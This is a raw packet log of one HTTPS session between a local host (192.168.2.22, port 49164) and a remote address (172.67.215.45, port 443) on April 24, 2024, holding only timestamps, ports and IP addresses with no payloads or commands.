Apr 24, 2024 10:24:13.978857994 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.978895903 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.978920937 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.978935957 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.981537104 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.981563091 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.981601000 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.981607914 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.981620073 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.983334064 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.983364105 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.983392000 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.983398914 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.983409882 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.985915899 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.985939026 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.985975027 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.985981941 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.985992908 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.987865925 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.987896919 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.987927914 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.987936020 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.987948895 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.988008022 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.990366936 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.990391016 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.990428925 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.990433931 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.990444899 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.990494013 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.992305994 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.992330074 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.992383957 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.992383957 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.992389917 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.994930029 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.994957924 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.995002031 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.995007992 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.995018005 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.997190952 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.997215986 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.997255087 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:13.997258902 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:13.997268915 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.001898050 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.001918077 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.001995087 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.002000093 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.002010107 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.002036095 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.002361059 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.002387047 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.002475977 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.002480030 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.002590895 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.004251957 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.004275084 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.004354000 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.004354000 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.004362106 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.005773067 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.005798101 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.005836010 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.005840063 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.005868912 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.008378029 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.008398056 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.008440971 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.008440971 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.008445978 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.008456945 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.010807991 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.010828972 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.010869026 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.010873079 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.010881901 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.027987957 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.028004885 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.028093100 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.028093100 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.028103113 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.033652067 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.033678055 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.033742905 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.033742905 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.033750057 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.039611101 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.039628029 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.039693117 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.039693117 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.039697886 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.043663979 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.043685913 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.043782949 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.043787003 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.043814898 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.054526091 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.054554939 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.054681063 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.054692984 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.054718018 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.061043978 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.061079025 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.061172009 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.061197042 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.061211109 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.067536116 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.067559004 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.067667961 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.067688942 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.067723036 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.070760012 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.070835114 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.070851088 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.070869923 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.070913076 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.077429056 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.077450991 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.077495098 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.077512026 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.077524900 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.077830076 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.077857018 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.077888012 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.077896118 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.077914953 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.078694105 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.078716040 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.078754902 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.078775883 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.078788042 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.080338001 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.080363035 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.080399036 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.080411911 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.080424070 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.081983089 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.082020998 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.082051992 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.082062960 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.082077026 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.083684921 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.083738089 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.083745003 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.083756924 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.083781958 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.084424973 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.084446907 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.084485054 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.084496021 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.084508896 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.085002899 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.085051060 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.085059881 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.085068941 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.085100889 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.086332083 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.086354017 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.086397886 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.086410046 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.086421967 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.087032080 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.087057114 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.087093115 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.087097883 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.087120056 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.087611914 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.087634087 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.087672949 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.087680101 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.087702036 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.089209080 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.089232922 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.089286089 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.089291096 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.089312077 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.089843035 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.089864016 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.089911938 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.089917898 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.089936972 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.090415955 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.090440035 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.090478897 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.090491056 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.090500116 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.091566086 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.091622114 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.091629028 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.091634989 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.091665983 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.091973066 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.091999054 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.092040062 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.092046022 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.092067957 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.093556881 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.093578100 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.093619108 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.093630075 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.093640089 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.094261885 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.094285011 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.094336033 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.094346046 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.094353914 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.094916105 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.094938993 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.094981909 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.094986916 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.095004082 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.096798897 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.096822023 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.096860886 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.096868992 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.096892118 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.098731995 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.098756075 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.098797083 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.098803043 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.098824978 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.099628925 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.099669933 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.099694014 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.099699974 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.099731922 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.100289106 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.100316048 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.100352049 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.100358009 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.100377083 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.100820065 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.100842953 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.100883961 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.100893021 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.100903034 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.102540016 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.102588892 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.102603912 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.102608919 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.102648020 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.103800058 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.103826046 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.103863955 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.103872061 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.103888035 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.104402065 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.104438066 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.104460955 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.104466915 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.104490042 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.104968071 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.104991913 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.105030060 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.105035067 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.105057001 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.106271982 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.106292963 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.106332064 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.106338024 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.106350899 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.107295990 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.107320070 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.107357979 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.107362986 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.107381105 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.107944965 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.107994080 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.108009100 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.108015060 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.108056068 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.109832048 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.109860897 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.109900951 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.109910011 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.109926939 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.111427069 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.111449957 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.111491919 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.111510992 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.111522913 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.113305092 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.113358021 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.113378048 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.113385916 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.113420010 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.115186930 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.115209103 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.115284920 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.115284920 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.115295887 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.117455959 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.117513895 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.117521048 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.117537975 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.117588043 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.117594957 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.119308949 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.119358063 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.119365931 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.119371891 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.119410038 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.121252060 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.121274948 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.121311903 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.121318102 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.121432066 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.123054028 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.123078108 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.123114109 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.123121023 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.123137951 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.124910116 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.124934912 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.124984026 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.124990940 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.125010967 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.127106905 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.127130032 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.127166033 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.127173901 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.127192974 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.128989935 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.129010916 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.129035950 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.129043102 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.129069090 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.130724907 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.130748987 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:14.130785942 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:14.130793095 CEST	443	49164	172.67.215.45	192.168.2.22
